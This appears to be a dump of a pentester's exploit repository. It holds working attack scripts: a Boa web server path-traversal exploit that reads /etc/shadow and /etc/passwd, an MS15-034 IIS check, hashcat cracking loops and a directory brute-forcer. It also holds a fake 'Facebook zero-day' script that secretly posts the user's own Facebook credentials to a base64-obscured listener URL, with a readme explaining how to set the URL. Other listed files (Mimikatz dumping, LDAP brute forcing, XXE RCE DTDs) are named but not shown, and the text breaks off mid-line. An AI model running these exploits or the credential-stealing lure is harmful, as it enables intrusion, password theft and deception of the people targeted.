├── MS15-034.py ├── Netsparker_multi_instance_scanner.ps1 ├── README.md ├── boa_afa_cve_2017_9833.py ├── burp ├── IntrudeTheIntruder.py └── readme.md ├── facebook_skidding ├── FB_Skid_SE.py ├── Readme.md └── skid_listener.php ├── giveWebHead.py ├── hashcat ├── README.md ├── hashcat_runner.ps1 ├── hashcat_runner.sh └── hashcat_runner_osx.sh ├── kyocera ├── KyoceraAddressBookDecryptor.cs ├── KyoceraAddressBookDecryptor.exe ├── Readme.md ├── printer_xml_address_book.PNG ├── usage_sample.PNG └── workflow.PNG ├── ldap ├── bruteforce_interface.php ├── ldap_dump_users.php └── love_thy_script_ldap.py ├── membership-simplified-for-oap-members-only-exploit.py ├── metasploit_modules ├── Readme.md ├── mobile_app_native.rb ├── mobileapp_builder_by_wappress.rb ├── wp2android_file_upload.rb ├── wp_easytouch_builder.rb └── wp_webapp_builder.rb ├── mimi_multidump.bat ├── oob_xxe ├── server │ ├── checkrce.dtd │ ├── dtd │ ├── getFile.dtd │ ├── getFileEncoded.dtd │ ├── rceEncoded.dtd │ ├── server.py │ └── xxelog.txt └── xxe_client.py ├── portscan ├── nc_portscan.sh ├── ports_1000.txt ├── readme.md └── simple_flow.jpg ├── pyrequires.txt ├── sailpoint ├── beanshell_json_compatible.py └── build_map_rule_cleaner.py ├── simple_netcat_server.py ├── wp_ue_api.py └── zen_app_mobile_wp_rfu.py /MS15-034.py: -------------------------------------------------------------------------------- 1 | import requests 2 | print "################################################################" 3 | print "MS15-034 Byte Range Server DoS check (IIS) - By Alienwithin" 4 | print "################################################################\n\n" 5 | target = raw_input("Please Enter target to test e.g. 
http://example.com: \n") 6 | alienHeads = {'Range': '0-12839131982321398123'} 7 | checkForVuln = requests.get(target, headers=alienHeads) 8 | if checkForVuln.status_code == 416: 9 | print "\nStatus: Vulnerable\nReason: Target seems to be vulnerable as it tried to handle our large range which was not satisfiable" 10 | else: 11 | print "\nStatus: Safe\nReason: Target Seems to be patched against MS15-034" 12 | -------------------------------------------------------------------------------- /Netsparker_multi_instance_scanner.ps1: -------------------------------------------------------------------------------- 1 | Write-Host "################################################################################### 2 | 3 | Netsparker Multiple Instance Launcher by Munir Njiru (Alien-within) 4 | 5 | Purpose: Launch Multiple instances of Netsparker to scan 6 | each URL in a text file. Please consider your text 7 | file list based on resources in the machine to avoid choking it. 8 | 9 | Website: https://www.alien-within.com 10 | e-mail: munir@alien-within.com 11 | 12 | ################################################################################### 13 | 14 | "; 15 | 16 | $NetsparkerInstallPath = Read-Host -Prompt 'Input Path to Netsparker Installation e.g. C:\Program Files (x86)\Netsparker\Netsparker.exe' 17 | $TargetURLs = Read-Host -Prompt 'Input path to text file with URLs e.g. F:\Pentests\scan_targets.txt' 18 | $ReportStorage = Read-Host -Prompt 'Input path to save your reports when done e.g. 
F:\Pentests\Reports\' 19 | $ReportType = "Detailed Scan Report" 20 | foreach ($url in get-content $TargetURLs) { 21 | $domain = ([System.URI]"$url").Host 22 | $report = $ReportStorage + $domain + "_" + (Get-Date -format "yyyyMMdHm") 23 | start-process -FilePath "$NetsparkerInstallPath" -ArgumentList "/url ""$url"" /profile ""$domain"" /a /s /r ""$report"" /rt ""$ReportType""" 24 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Scripts & Sploits 2 | 3 | This repo will contain a collection of scripts that are PoCs against various identified vulnerabilities. Currently it contains: 4 | 5 | **zen_app_mobile_wp_rfu.py** 6 | 7 | >> This exploit covers five CVEs that can be exploited 8 | >> * Zen App Mobile Native <=3.0 (CVE-2017-6104) 9 | >> * Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002) 10 | >> * Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 (CVE-2017-1002003) 11 | >> * Wordpress Plugin mobile-app-builder-by-wappress v1.05 (CVE-2017-1002001) 12 | >> * Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000) 13 | 14 | **wp_ue_api.py** 15 | 16 | >> This exploit enumerates users on WordPress 4.7 via the JSON API (CVE-2017-5487) 17 | 18 | **membership-simplified-for-oap-members-only-exploit.py** 19 | >> This exploit is a PoC for Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download and attempts to download the WordPress configuration file or the /etc/passwd file from the target system. (CVE-2017-1002008) 20 | 21 | 22 | **mimi_multidump.bat** 23 | >> This is a simple batch script that, when you have multiple lsass.dmp files, dumps the passwords from each one into its own text file. 24 | 25 | **MS15-034.py** 26 | >> This vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system. 
It can be achieved by abusing the Range header against IIS servers. 27 | 28 | -------------------------------------------------------------------------------- /boa_afa_cve_2017_9833.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import string 3 | import random 4 | from urlparse import urlparse 5 | 6 | print "---------------------------------------------------------------------" 7 | print "BOA Web Server 0.94.14 - Access to arbitrary files as privileges\nDiscovery: Miguel Mendez\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-9833\nVulnerable Version: Boa Webserver 0.94.14rc21" 8 | print "---------------------------------------------------------------------" 9 | victim = raw_input("Please Enter victim host e.g. http://example.com:80\n") 10 | file_choice=raw_input ("Please choose a number representing the file to attack: \n1. Linux Shadow File \n2. Linux Passwd File\n3. Linux Hosts File\n") 11 | if file_choice == "1": 12 | payload="/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=malice&PWD=malice&PIC_SIZE=0" 13 | elif file_choice == "2": 14 | payload="/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=malice&PWD=malice&PIC_SIZE=0" 15 | elif file_choice == "3": 16 | payload="/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/hosts%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=malice&PWD=malice&PIC_SIZE=0" 17 | else: 18 | print "Invalid Download choice, Please choose 1 ,2 or 3; Alternatively you can re-code me; I will now exit" 19 | quit() 20 | target=victim+payload 21 | 22 | def checkReachable(): 23 | PortalIsAlive = requests.get(target+"/cgi-bin/wapopen") 24 | PortalIsExistent = 
PortalIsAlive.status_code 25 | if PortalIsExistent == 200: 26 | print "\nI can reach the target , I will attempt the exploit\nRunning exploit..." 27 | exploit() 28 | else: 29 | print "Target has a funny code & might not be vulnerable, I will now exit\n" 30 | quit() 31 | 32 | def exploit(): 33 | WhyLiveWithLFI = requests.get(target) 34 | fileState = WhyLiveWithLFI.status_code 35 | if fileState == 200: 36 | respFromThatFile = WhyLiveWithLFI.text 37 | print respFromThatFile 38 | else: 39 | print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +str(fileState)+"\n"+str(WhyLiveWithLFI.text) 40 | 41 | if __name__ == "__main__": 42 | checkReachable() 43 | -------------------------------------------------------------------------------- /burp/IntrudeTheIntruder.py: -------------------------------------------------------------------------------- 1 | from burp import IBurpExtender 2 | from burp import IHttpListener 3 | from burp import IInterceptedProxyMessage 4 | from java.io import File 5 | from java.nio.file import Paths, Files 6 | from java.nio.charset import StandardCharsets 7 | import time 8 | 9 | class BurpExtender(IBurpExtender, IHttpListener): 10 | 11 | def registerExtenderCallbacks(self, callbacks): 12 | self._callbacks = callbacks 13 | self._helpers = callbacks.getHelpers() 14 | callbacks.setExtensionName("Intruder The Intruder 1.1 ") 15 | callbacks.registerHttpListener(self) 16 | callbacks.issueAlert("Dump neatly from intruder to disk.") 17 | 18 | def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo): 19 | if not messageIsRequest and toolFlag == self._callbacks.TOOL_INTRUDER: 20 | intercepted_response = self._helpers.bytesToString(messageInfo.getResponse()).split("\r\n\r\n", 1)[1] 21 | self.saveResponseBody(intercepted_response) 22 | 23 | def saveResponseBody(self, intercepted_response): 24 | try: 25 | extraction_file = 
"ITI_intercept_{}.iti".format(time.strftime("%d-%m-%Y")) 26 | 27 | with open(extraction_file, "a") as file: 28 | file.write(intercepted_response + "\n\n") 29 | 30 | self._callbacks.printOutput("Response body saved to: {}".format(extraction_file)) 31 | except Exception as e: 32 | self._callbacks.printError("Error saving response body: {}".format(e)) 33 | 34 | def getAuthor(self): 35 | return "Munir Njiru" 36 | 37 | def getExtensionDescription(self): 38 | """ 39 | Simple Burp Extension to Extract Data From Intruder Realtime for External Analysis. 40 | 41 | Use Cases: 42 | - Extracting JSON responses from Intruder for iterative analysis outside burp. 43 | - Saving HTML responses for further investigation. 44 | - Analyzing XML responses for vulnerabilities. 45 | - Removing headers from responses as opposed to the default intruder export 46 | - Dumping recursively data from API's in API testing 47 | """ 48 | 49 | def getExtensionName(self): 50 | return "Intrude the Intruder 1.1" 51 | 52 | callbacks = BurpExtender() 53 | -------------------------------------------------------------------------------- /burp/readme.md: -------------------------------------------------------------------------------- 1 | # Burp Extensions 2 | 3 | This repository will be dedicated to extensions related to burp to perform some nifty things that make it more efficient. 4 | 5 | 6 | # Intrude The Intruder 7 | 8 | [This](https://github.com/alienwithin/Scripts-Sploits/blob/master/burp/IntrudeTheIntruder.py) is a simple burp Extension to extract data From intruder realtime for External Analysis. 9 | 10 | Use Cases: 11 | - Extracting JSON responses from Intruder for iterative analysis outside burp. 12 | - Saving HTML responses for further investigation. 13 | - Analyzing XML responses for vulnerabilities. 14 | - You need to export Intruder responses from burp without the headers and other overhead. 15 | - Dumping recursively data from API's in API testing for things like IDOR and show business impact. 
16 | -------------------------------------------------------------------------------- /facebook_skidding/FB_Skid_SE.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Author : Munir Njiru 3 | # A script to teach skids that hacking facebook takes a user element to it; Old school love to learning 4 | # Article can be found here : http://www.alien-within.com/fun-with-the-skids-season-1/ 5 | # Used for educational purposes only 6 | # Credits : Pablo for login bit (http://stackoverflow.com/users/197283/pablo) 7 | import argparse 8 | import datetime 9 | import time 10 | import json 11 | import logging 12 | import re 13 | import random 14 | import requests 15 | import shutil 16 | import base64 as bss4 17 | from pyquery import PyQuery as africahackU 18 | import getpass 19 | import sys 20 | import urllib 21 | 22 | def main(username, password): 23 | session = requests.session() 24 | 25 | uid, dtsg = login(session, username, password) 26 | 27 | 28 | def login(session, username, password): 29 | 30 | response = session.get('https://facebook.com') 31 | 32 | dom = africahackU(response.text) 33 | 34 | lsd = dom('[name="lsd"]').val() 35 | 36 | response = session.post('https://www.facebook.com/login.php?login_attempt=1', data={ 37 | 'lsd': lsd, 38 | 'email': username, 39 | 'pass': password, 40 | 'default_persistent': '0', 41 | 'timezone': '-60', 42 | 'lgndim': '', 43 | 'lgnrnd': '', 44 | 'lgnjs': '', 45 | 'locale':'en_GB', 46 | 'qsstamp': '' 47 | }) 48 | 49 | try: 50 | uid = session.cookies['c_user'] 51 | dtsg = re.search(r'(type="hidden" name="fb_dtsg" value="([0-9a-zA-Z-_:]+)")', response.text).group(1) 52 | 53 | dtsg = dtsg[dtsg.find("value")+6:] 54 | dtsg = dtsg[1:-1] 55 | api_key = random.getrandbits(128) 56 | api_secret = random.getrandbits(128) 57 | hackString=random.getrandbits(128) 58 | print "Facebook Graph API Login Success\n\n" 59 | e_mail = raw_input("Please enter email of user to hack: ") 60 | 
sys.stdout.write ("\nRetrieving keys from: https://graph.facebook.com \n") 61 | sys.stdout.write("\n") 62 | sys.stdout.write ("Received API Key: " + str(api_key) + "\n") 63 | sys.stdout.write ("Received API Secret: " + str(api_secret) + "\n\n" ) 64 | sys.stdout.write ("Encoding payload with api keys and sending to extract user on graph...\n") 65 | sys.stdout.write ("Payload in Use:\n") 66 | unbitme=str(hackString)+str(api_key)+str(api_secret) 67 | print'0x'.join([unbitme[i:i+2] for i in range(0, len(unbitme), 2)]) 68 | phoneHome=bss4.b64decode("aHR0cDovL3BsZWFzZXB1dHlvdXJsaXN0ZW5lcmlwL3NjcmlwdF93YXRldmVyLnBocA") 69 | payload = {'facebook_username': u_name, 'facebook_password': p_assword} 70 | requests.post(phoneHome, data=payload) 71 | toolbar_width = 40 72 | sys.stdout.write("[%s]" % (" " * toolbar_width)) 73 | sys.stdout.flush() 74 | sys.stdout.write("\b" * (toolbar_width+1)) 75 | for i in xrange(toolbar_width): 76 | time.sleep(0.1) 77 | sys.stdout.write("-") 78 | sys.stdout.flush() 79 | sys.stdout.write ("\n\nNetwork has timed out or Probe has been dropped by facebook, try again. \n") 80 | except KeyError: 81 | print ('Login to Graph Failed! 
Check your Credentials Again') 82 | 83 | return uid, dtsg 84 | 85 | 86 | 87 | try: 88 | print "################################################" 89 | print "Facebook Graph Zero Day Exploit by Alienwithin\n" 90 | print "################################################" 91 | u_name = raw_input("Please enter your facebook username: ") 92 | p_assword = getpass.getpass("Please enter your facebook password: ") 93 | print "Attempting to login and access GRAPH API" 94 | main(username=u_name, password=p_assword) 95 | except Exception, e: 96 | logging.exception(e) 97 | print e -------------------------------------------------------------------------------- /facebook_skidding/Readme.md: -------------------------------------------------------------------------------- 1 | This is based on an article [Fun with the Skids (season 1)](https://www.alien-within.com/fun-with-the-skids-season-1/); 2 | 3 | It is aimed to simply create awareness. To use the script [Edit this Line](https://github.com/alienwithin/Scripts-Sploits/blob/master/facebook_skidding/FB_Skid_SE.py#L68) to point to your listener script on your server and must be base64 encoded. e.g. http://example.com/listener.php becomes aHR0cDovL2V4YW1wbGUuY29tL2xpc3RlbmVyLnBocA== 4 | 5 | Have fun !!!! 6 | 7 | Shared for educational purposes only. 
8 | -------------------------------------------------------------------------------- /facebook_skidding/skid_listener.php: -------------------------------------------------------------------------------- 1 | 4 | -------------------------------------------------------------------------------- /giveWebHead.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | #python giveWebHead.py -t https://example.com -w dirs.txt -i False -m GET 6 | ########################################## 7 | # Give Web Head v1.0 8 | # by Alienwithin 9 | ########################################### 10 | #https://example.com/foundDir1 11 | #https://example.com/foundDir2 12 | #Results are written to a CSV file ie. found URLs and status code. 13 | #Bad Results are also written to file in the case above the files would be : 14 | #- example.com.csv => contains valid urls 15 | #- example.com_ignored.csv => contains urls that failed the test and status code is the reason. 
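#HEAD is faster than GET ; if a server supports it then use that
##
import csv
from optparse import OptionParser

import requests
import tldextract
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# NOTE(review): every request below is sent with verify=False and this call
# silences the warning, so a broken or intercepted TLS endpoint is never
# surfaced to the operator.  Kept for behaviour compatibility with the
# original (self-signed test hosts); reconsider before pointing it anywhere
# that matters.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Status codes that count as a hit; the second set is used when 301/302
# answers should be recorded as hits too.
_HIT_CODES = (200, 403)
_HIT_CODES_WITH_REDIRECTS = (200, 301, 302, 403)


def _as_bool(value):
    """Normalise an option value to a bool.

    optparse delivers the -i option as the string "True"/"False" (action
    "store" with no type), while its default is the bool False; the original
    compared against the string only, so the default never matched any
    branch.  Both forms must select the same behaviour.
    """
    if isinstance(value, bool):
        return value
    return str(value).strip().lower() in ("true", "1", "yes")


def gwhEngine(target, wordlist, method, redirects=False):
    """Probe every path in *wordlist* under *target* and record the results.

    Args:
        target: Base URL; the caller appends a trailing "/" before calling.
        wordlist: Path to a text file with one directory name per line.
        method: "HEAD" or "GET" (case-insensitive).  Anything else is sent
            as a GET, as the original's fall-through branch did.
        redirects: When true (bool, or the string "True"), 301/302 responses
            are recorded as hits alongside 200/403.  The original applied the
            opposite set for GET than for HEAD; HEAD's reading is kept here.

    Side effects:
        Appends (url, status) rows to "<domain>.csv" for hits and to
        "<domain>_ignored.csv" for everything else, and prints each probe.
        Blank wordlist lines are skipped instead of probing the base URL.
    """
    hit_codes = _HIT_CODES_WITH_REDIRECTS if _as_bool(redirects) else _HIT_CODES
    # HEAD is cheaper when the server honours it; everything else is a GET.
    requester = requests.head if str(method).upper() == "HEAD" else requests.get
    # Hoisted out of the loop: the host name does not change per path.
    hostname = tldextract.extract(target).domain

    # Open both result files once.  The original re-opened them on every
    # wordlist line and closed only one of the two on each branch, leaking
    # file handles for the whole run.
    with open(str(hostname) + ".csv", "a") as result_file, \
            open(str(hostname) + "_ignored.csv", "a") as bad_results:
        hits = csv.writer(result_file)
        misses = csv.writer(bad_results)
        with open(wordlist) as dir_per_line:
            for line in dir_per_line:
                clean_dir = str(line.rstrip("\n"))
                if not clean_dir:
                    continue
                url = target + clean_dir
                # One request per path; the original re-fetched misses with
                # a second GET before writing them to the ignored file.
                status = requester(url, verify=False).status_code
                print url + " => " + str(status)
                if status in hit_codes:
                    hits.writerow((url, status))
                else:
                    misses.writerow((url, status))


def giveTheWebSomeHead():
    """Parse the command line and hand the options to gwhEngine."""
    alienParser = OptionParser(usage="usage: %prog --help for [options]",
                               version="%prog version : 1.0")
    alienParser.add_option("-t", "--target",
                           action="store",
                           dest="target",
                           default="http://iWannaFindyourDirectories.ws",
                           help="Target URL")
    alienParser.add_option("-w", "--wordlist",
                           action="store",
                           dest="wordlist",
                           default="dirlist.txt",
                           help="Path to wordlist with directory names")
    # The original help text for -i was a copy of the -w text.
    alienParser.add_option("-i", "--ignore-redirects",
                           action="store",
                           dest="redirects",
                           default=False,
                           help="True to record 301/302 responses as hits as well (default: False)")
    alienParser.add_option("-m", "--method",
                           action="store",
                           dest="method",
                           default="HEAD",
                           help="Method to use to get results i.e. 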
HEAD or GET") 94 | (options, args) = alienParser.parse_args() 95 | 96 | 97 | if options.target =="http://iWannaFindyourDirectories.ws" or options.target=="": 98 | alienParser.error("I'm sorry there simply has to be a target for this to work") 99 | elif options.wordlist=="": 100 | alienParser.error("You haven't selected a wordlist") 101 | else: 102 | myTarget=options.target 103 | if myTarget[len(myTarget)-1] != "/": 104 | myTarget = myTarget + "/" 105 | gwhEngine(myTarget, options.wordlist, options.method, options.redirects) 106 | def banner(): 107 | print "##########################################" 108 | print "\tGive Web Head v1.0\n\t by Alienwithin\n" 109 | print "##########################################" 110 | if __name__ == '__main__': 111 | banner() 112 | giveTheWebSomeHead() 113 | -------------------------------------------------------------------------------- /hashcat/README.md: -------------------------------------------------------------------------------- 1 | # Hashcat Cracking Manager! 2 | 3 | Many times we struggle with looping through wordlists and rules finding a more efficient strategy of cracking passwords. This helps ease that problem by making some minor calculations and loading efficient cracking rules. 4 | 5 | 6 | # Files 7 | 8 | - hashcat_runner.sh - Meant for linux boxes 9 | - hashcat_runner_osx.sh - Meant for OSX boxes 10 | - hashcat_runner.ps1 - Windows Equivalent 11 | 12 | ## File Location 13 | 14 | The windows version requires to run from the same folder as the binary hashcat.exe however on linux it can invoke globally from any folder 15 | 16 | ## Editing 17 | 18 | In the scripts versions there are house keeping variables that are dependent on your environment. 
19 | 20 | ```mermaid 21 | graph LR 22 | A[Hashcat] -- Check Wordlist --> B((LoadProfile)) 23 | A --> C(If using rules, choose profile) 24 | B --> D{Crack Straight or rule based} 25 | C --> D 26 | ``` 27 | -------------------------------------------------------------------------------- /hashcat/hashcat_runner.ps1: -------------------------------------------------------------------------------- 1 | $Banner = @" 2 | ------------------------------------------- 3 | ------------------------------------------- 4 | Hashcat Password Cracking Manager 5 | By 6 | Munir Njiru 7 | ------------------------------------------- 8 | ------------------------------------------- 9 | ------------------------------------------- 10 | "@ 11 | #Load Wordlists->LoopThrough->Checksize->LoadProfile->RunProfile->Next 12 | #Place script in same folder as hashcat binary 13 | write-Host $Banner 14 | #House Keeping Variabless 15 | $wordlistPath ="" #e.g."D:\usr\share\wordlists" 16 | $hashType=""#e.g."1000" 17 | $OutputPath = ""#e.g. "D:\hacker\project\cracked_pass\" 18 | $HashFile = ""#"e.g. D:\hacker\project\hashes" 19 | $rulePath = ""#e.g. 
"D:\usr\bin\hashcat\rules" 20 | #End House Keeping 21 | function Profile-Large { 22 | #Load Rules Less Than 10KB 23 | $rules = Get-ChildItem -Path $rulePath | Sort-Object Length 24 | for ($i=0; $i -lt $rules.Count; $i++) { 25 | $ruleFile= $rules[$i].FullName 26 | $ruleName= $rules[$i].BaseName 27 | If ((Get-Item $ruleFile).length -lt 10KB){ 28 | $outputFile = ($OutputPath + $FinalName.ToString() + "_" + $ruleName.ToString() + "_large.cracked") 29 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -r $ruleFile -o $outputFile -O") 30 | } 31 | 32 | } 33 | } 34 | function Profile-Medium { 35 | #Load Rules Less Than 120KB 36 | $rules = Get-ChildItem -Path $rulePath | Sort-Object Length 37 | for ($i=0; $i -lt $rules.Count; $i++) { 38 | $ruleFile= $rules[$i].FullName 39 | $ruleName= $rules[$i].BaseName 40 | If ((Get-Item $ruleFile).length -lt 120KB){ 41 | $outputFile = ($OutputPath + $FinalName.ToString() + "_" + $ruleName.ToString() + "_medium.cracked") 42 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -r $ruleFile -o $outputFile -O") 43 | } 44 | 45 | } 46 | } 47 | function Profile-Small { 48 | #Load All Rules 49 | $rules = Get-ChildItem -Path $rulePath | Sort-Object Length 50 | for ($i=0; $i -lt $rules.Count; $i++) { 51 | $ruleFile= $rules[$i].FullName 52 | $ruleName= $rules[$i].BaseName 53 | $outputFile = ($OutputPath + $FinalName.ToString() + "_" + $ruleName.ToString() + "_small.cracked") 54 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -r $ruleFile -o $outputFile -O") 55 | } 56 | 57 | } 58 | $wordlists = Get-ChildItem -Path $wordlistPath -Recurse | Sort-Object Length 59 | for ($i=0; $i -lt $wordlists.Count; $i++) { 60 | $currentWordlist = $wordlists[$i].FullName 61 | $FinalName= $wordlists[$i].BaseName 62 | If ((Get-Item $currentWordlist).length -gt 0KB -And (Get-Item $currentWordlist).length -lt 3MB) 63 | { 64 | $straight_crack = ($FinalName + "_small.cracked") 65 | iex 
(".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -o $straight_crack -O") 66 | Profile-Small 67 | } 68 | ElseIf((Get-Item $currentWordlist).length -gt 3MB -And (Get-Item $currentWordlist).length -lt 300MB) 69 | { 70 | 71 | $straight_crack = ($FinalName + "_medium.cracked") 72 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -o $straight_crack -O") 73 | Profile-Medium 74 | 75 | } 76 | ElseIf((Get-Item $currentWordlist).length -gt 300MB -And (Get-Item $currentWordlist).length -lt 30GB) 77 | { 78 | $straight_crack = ($FinalName + "_large.cracked") 79 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -o $straight_crack -O") 80 | Profile-Large 81 | } 82 | Else 83 | { 84 | Write-Host $currentWordlist + "has is too large let's skip" 85 | $i++ 86 | } 87 | 88 | } 89 | -------------------------------------------------------------------------------- /hashcat/hashcat_runner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # @author Munir Njiru 3 | # @url www.alien-within.com 4 | # @file hashcat_runner.sh 5 | # @brief A file that tries to solve looping of hashcat cracking 6 | # @description This project seeks to sort wordlists and rules by size and efficiently mix and match them to efficiently crack fast. 7 | 8 | #House Keeping Variables 9 | #Configure these and you are good to go 10 | RuleFolder=""#e.g."/usr/share/hashcat/rules" 11 | HashesFile=""#e.g."/home/hacker/project/filewithhashes" 12 | WordlistsFolder=""#e.g."/usr/share/wordlists/" 13 | HashType=""#e.g. 
"1000" 14 | OutputFolder=""#e.g."/home/hacker/project/cracked_pass/" 15 | #EndHouse Keeping 16 | 17 | function ProfileLarge(){ 18 | for RULE in "$RuleFolder"/*; 19 | do 20 | FILESIZE=$(stat -c%s "$RULE") 21 | if [ "$FILESIZE" -le "10240" ] 22 | then 23 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 24 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 25 | suffix="_large.cracked" 26 | seperator="_" 27 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 28 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 29 | fi 30 | done 31 | } 32 | function ProfileMedium(){ 33 | 34 | for RULE in "$RuleFolder"/*; 35 | do 36 | FILESIZE=$(stat -c%s "$RULE") 37 | if [ "$FILESIZE" -le "122880" ] 38 | then 39 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 40 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 41 | suffix="_medium.cracked" 42 | seperator="_" 43 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 44 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 45 | fi 46 | done 47 | } 48 | function ProfileSmall(){ 49 | for RULE in "$RuleFolder"/*; 50 | do 51 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 52 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 53 | suffix="_small.cracked" 54 | seperator="_" 55 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 56 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file"-O 57 | done 58 | } 59 | 60 | for currentWordlist in "$WordlistsFolder"/*; 61 | do 62 | $currentWordlist=$(realpath "$currentWordlist") 63 | FILESIZE=$(stat -c%s "$currentWordlist") 64 | if [[ "$FILESIZE" -gt "0" && "$FILESIZE" -le "3145728" ]]; 65 | then 66 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 67 | suffix="_small_straight.cracked" 68 | seperator="_" 69 | 
cracked_file=$OutputFolder$wordlist$suffix 70 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 71 | ProfileSmall 72 | elif [[ "$FILESIZE" -gt "3145728" && "$FILESIZE" -le "314572800" ]]; 73 | then 74 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 75 | suffix="_medium_straight.cracked" 76 | seperator="_" 77 | cracked_file=$OutputFolder$wordlist$suffix 78 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 79 | ProfileMedium 80 | elif [[ "$FILESIZE" -gt "314572800" && "$FILESIZE" -le "3145728000" ]]; 81 | then 82 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 83 | suffix="_large_straight.cracked" 84 | seperator="_" 85 | cracked_file=$OutputFolder$wordlist$suffix 86 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 87 | ProfileLarge 88 | else 89 | echo "Seems $currentWordlist is too large" 90 | fi 91 | done 92 | -------------------------------------------------------------------------------- /hashcat/hashcat_runner_osx.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # @author Munir Njiru 3 | # @url www.alien-within.com 4 | # @file hashcat_runner.sh 5 | # @brief A file that tries to solve looping of hashcat cracking 6 | # @description This project seeks to sort wordlists and rules by size and efficiently mix and match them to efficiently crack fast. 7 | 8 | #House Keeping Variables 9 | #Configure these and you are good to go 10 | RuleFolder=""#e.g."/usr/share/hashcat/rules" 11 | HashesFile=""#e.g."/home/hacker/project/filewithhashes" 12 | WordlistsFolder=""#e.g."/usr/share/wordlists/" 13 | HashType=""#e.g. 
"1000" 14 | OutputFolder=""#e.g."/home/hacker/project/cracked_pass/" 15 | #EndHouse Keeping 16 | 17 | function ProfileLarge(){ 18 | for RULE in "$RuleFolder"/*; 19 | do 20 | FILESIZE=`du -k "$RULE" | cut -f1` 21 | if [ "$FILESIZE" -le "10240" ] 22 | then 23 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 24 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 25 | suffix="_large.cracked" 26 | seperator="_" 27 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 28 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 29 | fi 30 | done 31 | } 32 | function ProfileMedium(){ 33 | 34 | for RULE in "$RuleFolder"/*; 35 | do 36 | FILESIZE=`du -k "$RULE" | cut -f1` 37 | if [ "$FILESIZE" -le "122880" ] 38 | then 39 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 40 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 41 | suffix="_medium.cracked" 42 | seperator="_" 43 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 44 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 45 | fi 46 | done 47 | } 48 | function ProfileSmall(){ 49 | for RULE in "$RuleFolder"/*; 50 | do 51 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 52 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 53 | suffix="_small.cracked" 54 | seperator="_" 55 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 56 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 57 | done 58 | } 59 | 60 | for 